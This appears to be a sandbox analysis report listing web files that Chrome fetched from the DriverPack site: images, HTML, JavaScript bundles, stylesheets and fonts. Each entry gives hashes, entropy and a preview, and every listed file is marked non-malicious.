      Preview:RIFF....WEBPVP8X........+.....ALPH.......m.H1...=."b.2....M.!7......k.);@.....=8.^..^,..S.)3e;.k/5.../.A]....1.~k.m.-...f`...../x3..C..Q.>.`AK).....t......`......o<..E...EB.......?.}~{{......>...../_...1.@..............._..._.~...............@.U...................?.........?..........?......W...&.....a.R.1.<..q...u..YY.f5.h^.?6%..K.kgn...<.*..@....^....Zi.~..E......r..I.z{VY)..{..m..R.+.|Luql{.%w-..rW.~..]...jmS3....9.A.j[....bv.l.3'....*VU..b.Z...U.s..>&.=)..i{]L..fg..WV.l...\.....J...JEuq........\.rQ...J....5K.js.0e;..&0d.*.!`..`Y%.V.......Pe. ..@....d.bj.M)......`....V..K@R.)Y..8.c[....u.V)\.&`..&3.y..$J.....\..L4...E....m.P..\.Q3..ys.....E1.!^...1....:A.....2..)h@..%`..\...,....*...~....Z..s...e.p.!.L{..........'qwm..p...R.Pl..8.q.!.'4.f..6.T...p......DR.=.s.&o5.}5.N....$.X.S.I...l..XzG.J7.0....q.<H..+..z..)..A.&...#v[..r.;...69..<..l1!...]tw.TF;s...h......w.....Z:.n8`...........u.I..J...4.w...4!......T..N....^..0.(.U..*...l.....S...@.....i
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):336
      Entropy (8bit):7.014434707604815
      Encrypted:false
      SSDEEP:
      MD5:117EAAD88DC90A4E1585EE8E041B93EF
      SHA1:DD95D923FDEE92953FC9A01F1B231D200EDA5882
      SHA-256:7A366BDC2124A8E20F7AB4352CD5803BEFB57E197314D7CF4E09D59BA5F5FC24
      SHA-512:E01BEFBA42A39FEA37577222728FC1D4F9063054F9334CBFE5662B936DF924C570D01717091918A61AAC7CA07639D849D105E6CF6BB76728836E3B1ED05E9D45
      Malicious:false
      Reputation:low
      Preview:RIFFH...WEBPVP8X........U.....ALPH......0...Bi.B....IvO.....{9.7.{.VP8 .........*V...>.^.M(%........g.........uC...#...S*...@.".w...#...b...........@....\}]q|.9D.a.H......#H*me........A.PVW/A)<.vWu....E..{.@....i.......\].N.h......3._.[!.,.'}....y.....*......2.....9@...k...h....K..r%.Ha...7I.'..{.f...r..K.....@j|A,X[^..Q..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):3928
      Entropy (8bit):7.936615802539839
      Encrypted:false
      SSDEEP:
      MD5:9A61F8E5D54C3D92E41183351FD56D00
      SHA1:85FB59C03EB7BC538E63785BBFECFF318F5B9DAA
      SHA-256:30A48F2EE9819FE8369CA05CA04ED3F4D03D122462E7F652505CB84D9229835E
      SHA-512:27DC46531CADD283E2495904D0DEAEB7AE9745EE53E17197393E1C7EAF999554EF3861FAFDB77C6EC420834DEEFC0E60F7EB5B4E538FA400ACB0A53CC9B4FE33
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/top-video-cards/radeon-pro-vega-20.webp
      Preview:RIFFP...WEBPVP8X........+.....ALPH.......m[.l.g.......{....p.-..@..4..............$...{&,9.........$..vxY....Kb.m.%+..kC.2.%.4O..v..$./...L.....1n:^.T.5.l:....=.Z....+a.!P.s..*`.7...UWj.{..,..0.......'..:..]<.!..u..n.=d..B....D..."}......[.*...B...E8..JnF.n...u.R..S.p.?.e...6HN.e....`..N9..w...!...PD.......sS...Ig..d2.T..}s...&G+j..5..]...m..nx..m!P.........4...$.l..g..5uU..-.^.u):,P^.u..S...;.vf...W&...}...x.....I../a...w...P#.I....W.w..1........T3.\..QJ@._Bk....A.F..9......;P...\...~y.......!dG}z.5b....@;......*......Q.K.....A.8..*. .7R.0".........EA5..i..V.......U..Q.i.B...*.&..6L...@`RZg`_.BZ.......X<C.#.;....Q...oW......CE...2.<;A.....5J..x1.T..G+E.....dR...8...}2.(.......e.ZXc.l...Xp.n./.<c.HqJ.d..Um...s.......?.7}=-.X...(.$SI.]./)...>.P........>>....2.T~..0.j.y..X.....2J..b_...Hv..0.}0/.}1....U,.L.yuQ...Z...G%.1.G.u.nM^...\..c.....!.[.L....h.....N.........B.8....B......".."..p.T..oD'5[.......Vt...%......"..VP8 p...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):4042
      Entropy (8bit):7.933456412908909
      Encrypted:false
      SSDEEP:
      MD5:88042B182B4B622BE0DF236F4CBA8C7B
      SHA1:AE427745B9933FE98E1628911E2B07E3434F6959
      SHA-256:6BE3ACDBD3DEB6423535F6D761E93AB7BE238441EA4659F5CF51A12EB27EB894
      SHA-512:2B3E04EF0613C78DDA3E9FAC6AE5B6E83597900AF1DF961DC57CBDA52C18CB1822E34977BC1C19B1CD1E2D0C37350E7A34C1EFA29C49B53F2D71C47C5B0BA7C8
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/top-video-cards/amd-radeon-rx-640.webp
      Preview:RIFF....WEBPVP8X........+.....ALPH.......m{U....)".B2C%..@....`..4..z....={.[.F.......OJ(9...3.._.O).w.4...u...s..PD.w....?....y.KN)........:.}I1.....<.%...._-...u..Rr.......8.%.....)....S...z.......O....s_rJ1...._.p].y.K....!....w...}.)..Z.,.RJ.4..[\..K.).\...z..>...].....u.KI)(.#A.{W......2....lV..k./f..r....uB]W.e.....,...kS.X.{..I..defg..5HS/...:N...n.Y.....)Y\...].S.fa....&.....I..W...JXTj4X.H...;f.f...z.a.w.5.\4X.D.=.Y.N..%....$./...A....,.yG...s..:.......P.I..@..A.5.c....f.:..$X]......>....?.}F..5..X...%..:.(....;..:..$......_A.A.fu..d`.'.Q.E.W..#I..%.IH.rm..".m". ..4..$.cqel .@.W.....h.,M....Q.0.....A.....K!...;@....yG5.*.I. .(...DA_.IaQ%Q.(.t.B."..Q.A.K.w...%I;.r.H.eaR$...-..M..........h.!..I...%J0Q...n...X...e.)...iG....M.x.......'n?.I..L.W2uO....d.#._...!...h.O..w.8.. ..Hf.}.....y..u. ..nh.J.t...8.].5.<.];.M._......>.d..\(..w..YsR.j...Hr.!.HV..t.K...d...W....D2.H.$pa...p.&........f...g.....,.....>.M:.B....7..7..G..@n..o@.....,.c$...7....b
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):370
      Entropy (8bit):7.120133408838951
      Encrypted:false
      SSDEEP:
      MD5:70F6EE7B7F7AE044C6A4BC12178AF9F6
      SHA1:7E32BDBFA4FC257852C563325E0CE5CD8D382D1E
      SHA-256:2E9F5D02D112ADF7DC627755E70797A9BD7E41C4A6D3719393FCB94EC2A5D02E
      SHA-512:09D55A93AB85EC840DA80783241C297263C85E59D3C79674254C71F07CB3E3EB825DC350CEB8E1F988C35EA194C9A9656567874BDF2B7D31A658CE55626A09FB
      Malicious:false
      Reputation:low
      Preview:RIFFj...WEBPVP8X........ .....ALPH.....pM.%]. .B!.. .B#.a..P....Fh..Q..D... \?.....hq.8.RT...~.<....o.J......z.T..2..@f...yw.......P.[M......7....3.....=q.......B...\0/$....`.d.y..T.\.o...Q..U...VP8 ....p....*!...>.^.N.%#"*......l..3....o'.....1......r.4@........S..Ca.....E.V....C$.-.!.9.yu>jX..p.....T60.-..^....GA...7R_<.p.....pD.y.j.Q.;.~..Q..18...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):8636
      Entropy (8bit):7.971762251607862
      Encrypted:false
      SSDEEP:
      MD5:4C4ABC7FF80ECB14277C65257230E80E
      SHA1:1165FA37088B5FBE35AD8ED1B184AB4C72E04E3B
      SHA-256:5F8668193D513256A243EE9DF17A255A297214C7660B876B2A590AF6F01C38CB
      SHA-512:F368F3FEE1B48AD23DE9034C6450155DB1E00A30B46FF46A68D0B28C13DEB4F66CFD7B0F20CC6D24A29FC14607E73F311640F0406E8A106D8D0D81A249F296FF
      Malicious:false
      Reputation:low
      Preview:RIFF.!..WEBPVP8X...........q..ALPHo......m.H....v.....;k.....fn..RdP..v....y....t;....$d.Y:..m6.9..8..n..F..Y.7{B..Qzw#9[..\..S`.A.........h).m[j..r[r$.{...:.w'.c1WR.....Y.{.......'..r..{&u.8.N/q5..Pk-rn....<..%..n*.=IS.)f..q.4\;..0\.w..C....^{..>:..0...g..m.ap..+m.Nm)....Ae.teHh.[.......nq.W6.Cc..=\Y....-...z.P.<-..J....mp+..f.....]TbGY.K.D.vK.I].H.....$....C....u.&*..&4...-T.....@.n..0\.....Gh.[l.l...{z.[l.l...3.Z.l....-vW..p.~x......{..{.......]..gD.L.>..w>|.w.b......&>gyQ.U]7M..uU.....y..~..s..M...me...w..<....:....I.......+vmq....T..z..}.|T.....7u..`G8d..-........c.x.w.;t..c.{R...>.4..%5>...e-..>.*VR....t.i......h......}.IVP8.`c..........#i.....$I..R....H.1.D(...],?^.u(<.C.L......Ql...l=..+$tg...H.\..g..M(*a......H.J..W"....-.~<.H< ........U...(.~.,.c.8...g.0...*.8;.d..C..l.4.......m}AP.....@......U![.@.Jdl.H@.......}.=r...'..m.....r..$........+....M&=#..o].C...?..dq......)...G...q........9....tM.}..j...`.!.]......2....=>..}...\ .].H..VfP...z.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 318x174, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:dropped
      Size (bytes):1748
      Entropy (8bit):7.85835362563485
      Encrypted:false
      SSDEEP:
      MD5:C44D9B5C34E78058AF6B59C94A31C957
      SHA1:03B0D09E647604C46C88FA71265508F397F94DAA
      SHA-256:76022B7171DFDE496B8F7B57EF44A810993089047B7139BC73AE600B0DD0A2BA
      SHA-512:3E3C46357CEA1E36F74DD23F66E6ACC72D9D9FE7219305783472214159813D5615F1C953086277BB90D09C94D936197E404350EF116C2789BDDA903F6FB292D8
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8 .....+...*>...>.h.Q(&.".4.....cn.|.....%..y../w]~.t.....'...i..3.u..5..X.......A.jp.$...S.a%.|....s.(....ID.....J..AF.\>E...`..s..g.J.........t...F..6I.}.....(r.J..<...m....1.d]...n0... ..t.H..0.H.J.0.>......1.NJ.6.A.....<..bI_....Q....?...AN.]H.<H..O..K&..9...7.t.H.=t.K4a~....r/U..Q!.6*...D.J..ZN..K.pq....9.1.."..,.eN...A.jwC.a%.|..3.(....>.N..............C.......,................dv......@$4..s...V..H:.................:B.k...w{.).@.:...P.$.......c.JB..A..!.......<:^.m.....:..{&q........[X$..g.!%.b.......8)W.H.O.M..d*..S..i.6.B].[F...Q.N]4....R.z.(..".......Ee...0.v.1.........`.#.....M.^}:..G.;G.i.E\dQ..bM....Q...&..n6.4..*~e.k.v(L...E.H....A....y...<.j.3.GZpY...t.t.R..z.U......=.W.;aN......j=.(_y..<L.].].KW...K35.Xe-9`...L.`$.!1...@..;,.x.P..]..k..-..'..t.eP.j.6~[..?P.Hw....X.$j-..MX.}"c...A..P.u8j.3../8.....y......o.{s.>..G..0.w..,Z.U....nV....[..(...u]..x....O>.........l..<E...R..T..:.d..Ox2fX.].ZB.........{0J..j\r.....w.tkBq3
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (52314)
      Category:downloaded
      Size (bytes):282684
      Entropy (8bit):5.270811553694395
      Encrypted:false
      SSDEEP:
      MD5:FA0DF745B8DBF8F6D9F84E5884950296
      SHA1:4141D9E1CA04219711826207D271655E4C44E3A8
      SHA-256:00DC28A5B2993E2E39246CB4D84EFEF9E76AFDBE0B8E1B28251A1DCB21195265
      SHA-512:961EE1C9008F08F3501C5399B318D1C847AAD28AB275CB4A190D92E6ACC61029A04BE7EADA9371D5E5A8E05E4ABC8247A42C8C948965512B17C6C15B3DD64BE4
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/en
      Preview:<!DOCTYPE html>.<html dir="ltr" lang="en" prefix="og: https://ogp.me/ns#">.<head>.<noscript>. <meta http-equiv="refresh" content="0;URL='https://driverpack.tilda.ws/main-page'" />. </noscript>.<script type="85e69fdcb7555cc6b739980e-text/javascript" src="/adblock/first-local.js"></script>.<script type="85e69fdcb7555cc6b739980e-text/javascript" src="https://dwrapper-prod.herokuapp.com/adblock/second-remote.js"></script>....<title data-react-helmet="true">DriverPack | Download free driver update software</title>.<meta data-react-helmet="true" charset="utf-8" /><meta data-react-helmet="true" http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><meta data-react-helmet="true" name="viewport" content="width=device-width, initial-scale=1" /><meta data-react-helmet="true" property="og:type" content="website" /><meta data-react-helmet="true" property="og:image" content="https://static.driverpack.io/pic/logo-og.png" /><meta data-react-helmet="true" property="og:image:type" conten
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):1080
      Entropy (8bit):7.759178590148912
      Encrypted:false
      SSDEEP:
      MD5:C2A0B1021EC20BF293767CBBD7642774
      SHA1:60D04DF2C499867479B221C85E820AF58DF6DE26
      SHA-256:9F31374503AD249308AB54949FF7151479E90D4E29321DCB4C12EBAB39DCAB9D
      SHA-512:9CADFDE84FAC48438862DE0833E42ABB4E8AB73C83528D2EE654294213494254AB1244B4986D979D3D9DEE1C9374E12F9EB5AD4F3C0323A897E8B14B6542197D
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/thank-you_arrow-chrome.webp
      Preview:RIFF0...WEBPVP8X........s..5..ALPH_......Ir%I.P... .BC..A..A..A..A..1...gXi.f.....$O.=..N#.j~....xJ.:M:mj`I..D..3n.mUh...H....8../........`6..pQm.n.B.....qX..p.....'<g.....+(..bd........K.6.u...........BO...xZ[\.0..\.*p.3.O..B5%r... ...&pP;..W&z.@.{|.U.j.....bJt..|.-H..8'#..$...OEn....b.#YBb....w_L#............D.u&..\...\.#.[}t2A:YF.^....Fd_.....P.......@..s.~..Nl..Y7!.-'+.h.<.......]5!O.......M...<.z.s.T..NB.O.......Y...4..%.c.vE.h6fm.j.D.o..5....f%.$nb.w....<.....'..,..h.>.t...Bb.~/&.......(R.L..y...x../PoR..u.......i-.!;..K.?u..D.Z..,.>....!..Aj.y..F...;.......w........-.....$...V..j.j...JZf....9.......VP8 .........*t.6.>.f.Q(%$".......gn.n^.`.....F .lO..M................./....}...-..e.!0..E..H.T:.W....;.....|..R(...^.\..>...-8.I5:".+1..]...Ou.`.(..8...>T.h../h8..B..Cs.|.c4..B..9.C."-....)nO...h.b....@.u..H.b........E. ..Z.}.... .tQ...y>+.j.T..Xp.....?pt...O.g..b.....d...........#.<&..`)&6hg.=....a.cg..y...../.#.Y.yE..k....!.=........].....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text, with very long lines (1024), with LF, NEL line terminators
      Category:downloaded
      Size (bytes):503801
      Entropy (8bit):5.43768005522515
      Encrypted:false
      SSDEEP:
      MD5:BD76E6487068E35B07AD44D5EDB4DF14
      SHA1:7FA4BEC9D5183CA5ED52F3DF38153E44FEC5C418
      SHA-256:33D5E452E137CCE17C542F8BAD037C7E2CFCBE04C61F7FA06A69920B877CCCE8
      SHA-512:B3D9D08FFF5CF1739396EF6BD5839009CB876C3C4DD8FE614FE2F0189AFFBF5FB5B55C787E746AA65DA794F79FE4D94B29F7088495E5F200DBB2D8708800B548
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/build/vendor.4f8b1f6d1efea490a16b.js
      Preview:!function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n=window.webpackJsonp;window.webpackJsonp=function(r,i,a){for(var u,s,c,l=0,f=[];l<r.length;l++)s=r[l],o[s]&&f.push(o[s][0]),o[s]=0;for(u in i)Object.prototype.hasOwnProperty.call(i,u)&&(e[u]=i[u]);for(n&&n(r,i,a);f.length;)f.shift()();if(a)for(l=0;l<a.length;l++)c=t(t.s=a[l]);return c};var r={},o={1:0};t.m=e,t.c=r,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e["default"]}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="/build/",t.oe=function(e){throw console.error(e),e}}([function(e,t,n){"use strict";e.exports=n(607)},,function(e,t,n){var r=n(10),o=n(49),i=n(32),a=n(33),u=n(42),s=function(e,t,n){.var c,l,f,p,d=e&s.F,h=e&s.G,v=e&s.S,g=e&s.P,y=e&s.B,m=h?r:v?r[t]||(r
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (3700)
      Category:downloaded
      Size (bytes):167837
      Entropy (8bit):5.554251711314392
      Encrypted:false
      SSDEEP:
      MD5:1AA9F3A1035AEE8D79705488BFDED714
      SHA1:9D42F11935B0A86FA2C9B66177C040FF55128AD3
      SHA-256:7CED14EFA1E5A2A3AD5FF50891CE5FFE90C584E57D2F651A2E173A34F8254961
      SHA-512:50549DE2E84ADF2493FF098F8978AC826833FD2F930EB522D71B13ADDB3D933024984563F6F577D0177C8A8405925ED9F4BEFE6CF737395FEF11C9657FCA6E2D
      Malicious:false
      Reputation:low
      URL:https://www.googletagmanager.com/gtm.js?id=GTM-WHSVF6
      Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"107",. . "macros":[{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__j","vtp_name":"document.documentElement.lang"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__jsm","vtp_javascript":["template","(function(){var a=navigator.userAgent||navigator.vendor||window.opera;return\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text
      Category:downloaded
      Size (bytes):912
      Entropy (8bit):5.409195352170273
      Encrypted:false
      SSDEEP:
      MD5:0AB3286F0B3794F44A9DE589D00EB9CC
      SHA1:2543E761794E8B4F244F7EF57A8ECCC3DAD682D6
      SHA-256:8086DCEBA50961D88E2C9E35A2CBECC3F4FD02D88509B56D495BC28DC2D5D0FD
      SHA-512:D0921FD7B69FA57BA177BF2606E771AAE46A58A2E0AD81B9C543A5AA4D96ABCCA4AE416CCFE70DF4837DF5B2CC476BF7323A61B6AC7BCDC05243817EA3A4251B
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/adblock/first-local.js
      Preview:var first_local = true;..console.log('first-local.js is loaded...');...// ....... ... ......... .......... .. URL.function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, '\\$&');. var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return '';. return decodeURIComponent(results[2].replace(/\+/g, ' '));.}..// ........ ....... ......... 'no_adb_redirect=true' . URL.if (getParameterByName('no_adb_redirect') === 'true') {. // ......... cookie .. 2 .... var date = new Date();. date.setTime(date.getTime() + (2 * 24 * 60 * 60 * 1000)); // 2 .... var expires = "; expires=" + date.toUTCString();. document.cookie = "no_adb_redirect=true" + expires + "; path=/";.}
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text
      Category:downloaded
      Size (bytes):7536
      Entropy (8bit):5.4379187601195165
      Encrypted:false
      SSDEEP:
      MD5:45E5D8CC7C0B5BBA31443364A52A32D7
      SHA1:FD5872FC513C1B24112125A25131FA6B38273C6B
      SHA-256:91732A4B52EBD678CA3DD8BFA651D992CB8A6DE206518376F68642EF91C5B7DC
      SHA-512:5C70C0DD9AE0022E39063A09EBA5ECCEFD44B1326AAE9019402484BCA3C03EA39887698A77FC4EC14CC2F18F0077F39C48B99DA36BDB1D0C0190FE7A418EFDCC
      Malicious:false
      Reputation:low
      URL:https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap
      Preview:/* cyrillic-ext */.@font-face {. font-family: 'Ubuntu';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoC1CzjvWyNL4U.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Ubuntu';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoC1CzjtGyNL4U.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Ubuntu';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoC1CzjvGyNL4U.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Ubuntu';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.g
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):2588
      Entropy (8bit):7.892437566970758
      Encrypted:false
      SSDEEP:
      MD5:D9A5C3548ACFEF55B0D922913EA449AB
      SHA1:9D99B4B8093D718257F5B0F2E21719F646989811
      SHA-256:5054639A00E4CAE4F1FA3F0590800CD075F491A4248624F6BC944A7AA25C5AC4
      SHA-512:D128A4EBE1EB2F218E83CA77061C7F6A9598E92B61F64B26C9C40EAD0D0040ED006D06B66528EC6CABF9567A8D73769C01858C14089EDF2A5575F7C7739C16DC
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/thank-you_logo.webp
      Preview:RIFF....WEBPVP8X..............ALPH..........o..`%]...,..,....0<..8..4]..deg~....y1"&..;.,M.)~.b.......'.5~..{).......?L.6........n?.([..w.... ..9.3..Q......Q......u..r......."...CT......@g. ...h..sJ,A.. .7.....^..`...{,j..V.v Ql.U.bG.!..r.8.^J.$V....#<J.Dw..}d....3.L.B.............|.6 .8.J....y.x.W..B....r.......&-@r..9v/..J-@.Y........-@iX...Uk......5v..ue.z^...D#:hj.0..-v$..I.X.+/.b'..]m.@*^.......fxa./..aS.A.l.7..:.....G..N*V....?.2..F*fV..p....;...%"...|....uUVu.E...~..........}.A....g......iJ2H..z.M..?s..<.2...}...X.C(..m..yzGgA...........R....yOj/m...}|d.K...g...f...?C.....8{..n.......`>..#.oFq..<Mb....ZG..$o..v.FM.-...z....z,'...*R......}9....).u3.....F..7.czH......}.k..^...2.?.....Ds.?......7....H..V.......E7..<Y.>..x...X....W.>.Ya.....+p2...x...sSu......+.XY..Zy.&..o..uJR.B.NhNW'...v.t&..V....A.....~n..x.....,..O.....H.i{7q.K..U+.^1.L.L.f.qv.0....;.......`...g.Fz.Q....!.5..Q.........w6.[v.m.$...Oom..:.4.7..6F.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):5712
      Entropy (8bit):7.949540759894264
      Encrypted:false
      SSDEEP:
      MD5:2B38B4BE3040190985853067CAAFDEB2
      SHA1:8E06F0623AD8E784F33AAB5CE65D0FE7AEBF51C8
      SHA-256:95DD70B6B645A574C8337BE6A1DCE4C033472F8AEC6B59EFD0384B5D5D90F50D
      SHA-512:8F3DDA2065F62550929FE52EF851183186980EA41D17B6ADEEE5F36A0DDADA5A12146FC7E628AB301BF04CBCC0ACC2D3FFA72C8CECE0A5016A7631AB40A0EF59
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/publishers/computerra.webp
      Preview:RIFFH...WEBPVP8X........S.....ALPHD.........D...Y..B."&.Y(....n.z.t.,J... ..Sl&..*..C..7.T.&.7.o.....S<.*B..z..J.y.H,...p.,.....`..*"&.........G.L....Db n.o."..H$....V..1.(.x.......W..vk....s...".L#X..Q.=.c.'...#...2..t7!<>.X..[..Z...%.M.....`..=I.dR.`..F'..h...0..'......U..y......]OQ....1e:.-+.0.&...y..z.xQ.."2...z.9K..T.Y.=...L..[.?..s..Q..{[..SQB.Me..P...,.....L....g2....S.....)S.~.5....d...OZ....~{...3I.4.b...]PA^..s...m=..Z....b..(.X.5A..YK7.0...-...".*.X ..].l..}_t....f(u.k..1.L...{..p..N....k.-...u.Y.O4.:.|y...&.aoq...QV\.Z..x.a.i....Et+.....PE..u...F.....u.b....C...B..@..k.y....|>.?Wi.....L$/.jY.6...#l..k.I..Sy.L.Sj....nQj...F..Q...`..]....." N(|;..].;M.F'.4.f.j..!Do.}...;...oa...0...&\..-#.....".D.A.gi7......5....P.$.`...E....*..8...j.o^...~`.....'.~7..b.Sk......@...@..r. ....J..^......P...B.$@|.p...Z.....;U.eM.f.CY..M.d...........x.]P.b......b.. ~'8..".On.6./~..%.;S.F.J....xs.c....:..l.i..s.`.^.J.......vt.WKt.;..Ts...E.....)#f.+.......
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon
      Category:downloaded
      Size (bytes):13764
      Entropy (8bit):6.459123147635845
      Encrypted:false
      SSDEEP:
      MD5:D6C78847FEB3754039B3538423995777
      SHA1:00989E79CD8B3789ACFC060BABE7E6A9D30F22C4
      SHA-256:A501CB7628A8A84CE024C9D247BCCA9216B1D243866974FE87C2D570B6BB8F56
      SHA-512:F4EACDF0503562250D7267FB18A91206EF2BA74A1767B5F4227C33B87A058005D8B6D03F43FC7F349E4DF725D24EC60815A00F0DE09E4623944B16905505AF41
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/font/icons/icomoon.ttf?5cmyzq=
      Preview:...........0OS/2...........`cmap.V........Tgasp.......p....glyf.......x..1.head.5.?..2....6hhea...$..2....$hmtx.`....2.....loca.).j..3....\maxp.=.;..3.... name.J....4.....post......5.... ...X.......................3...................................@...(.....@...@............... .................................8............. .(......... ................................................79..................79..................79...........:.........../.7...2.3267..../."&#"..7"....#"..0...................0&#..#"........326?....;.26707>.765...3267>.7067>.7>.?.>.7>.'../...#..'"&#.....b`.,!......Tc...J......R.&.........K. ..............{...................................."...........................%.........83!1....=-................#....".a....R..;........$............10u11.;.......h8.E....[.........d......................#.&.J.g......7."&=..."'..?.54676.............#17.7."&'..=.'&47>...54632.............#1."'..'&547>.7632............#."............327>.7654'..'&#..<R..Z......z.....q...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):814
      Entropy (8bit):7.639935393012609
      Encrypted:false
      SSDEEP:
      MD5:1B79DD7595F1808488DB25C5D2F31715
      SHA1:E653008F3894175F6A4FBA64A29DACEDE768ECA0
      SHA-256:C5D53F7F13BE02FE47F42D0D4C17FC75AEDD2196BBE51A983B9C04C30AAA2016
      SHA-512:3F995C6EFB4629080B4C9411C00F4C9C3BA09946AA379D5F745895EEF0106E065B344A7F9AC7F3EEFFCE7B007689E5B8F1A7BD2D8F58D40612E5CCD6B80741B9
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/eset-icon.webp
      Preview:RIFF&...WEBPVP8X........?.....ALPH.....pb..\."._..].;......f.AvHT...........1....f.6^..|1n.Qi*.R.....J..@P<hE..$..B....6....>....k.....l..[.N.g.....-.b..d..n..k...L. ...W...lb..S..........VP8 ^........*@...>.^.P($."...Y...l..2...`.d.m......Cy7.....mm\X4.....H..x.3C.Cw.G.3...[.X.Y.{uNz.\!.).....T..o.2.f...SBi^.]....Z.6.......6p1.2.s.H.h8.....{...O..."...6.|,...p...E.'R.....EN.RQ.D...|.QW.!.G7a....3n"..*.....jk.~..8.K.+..;..v ....P3..RC.._...../V....p..P6.r...wH|...z.d...%]...6.........LB....#Rn..2..>......2....^`.....b.O.e.E4....;....`P\.|3...-..........o.I...v...o.>-5..pI....u..+.L|......e....g...*I....Dp.v.M..V.O9b./G.V.&.o)R$r.=.\..h.[E.....~.{%..<.'..I.G.\.Z.E..........u....Pe./..,.mP.wh.....s......e..5*`A...\5q.ky..r.^..;Q..,.....Qx..'..+(..H>'..e........
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):6308
      Entropy (8bit):7.956150632655777
      Encrypted:false
      SSDEEP:
      MD5:CC777C9BCAD5FE73EF4F3295416D3CC2
      SHA1:9412D39253B183B7AD7E3E8EEB71099330BCF3EF
      SHA-256:E371DD28DBCBDE344514744FD6F29A5A7187359BCF65D8E00512C89369EEC744
      SHA-512:AE2ED2A742CFA7A908E89BAE960E6232B06DBF584BB580AEB132A53A75A79119BE2D5E6E880F6E0DDDEC77C616F0383C92C13CA7874D4733974C43C8B2A5C220
      Malicious:false
      Reputation:low
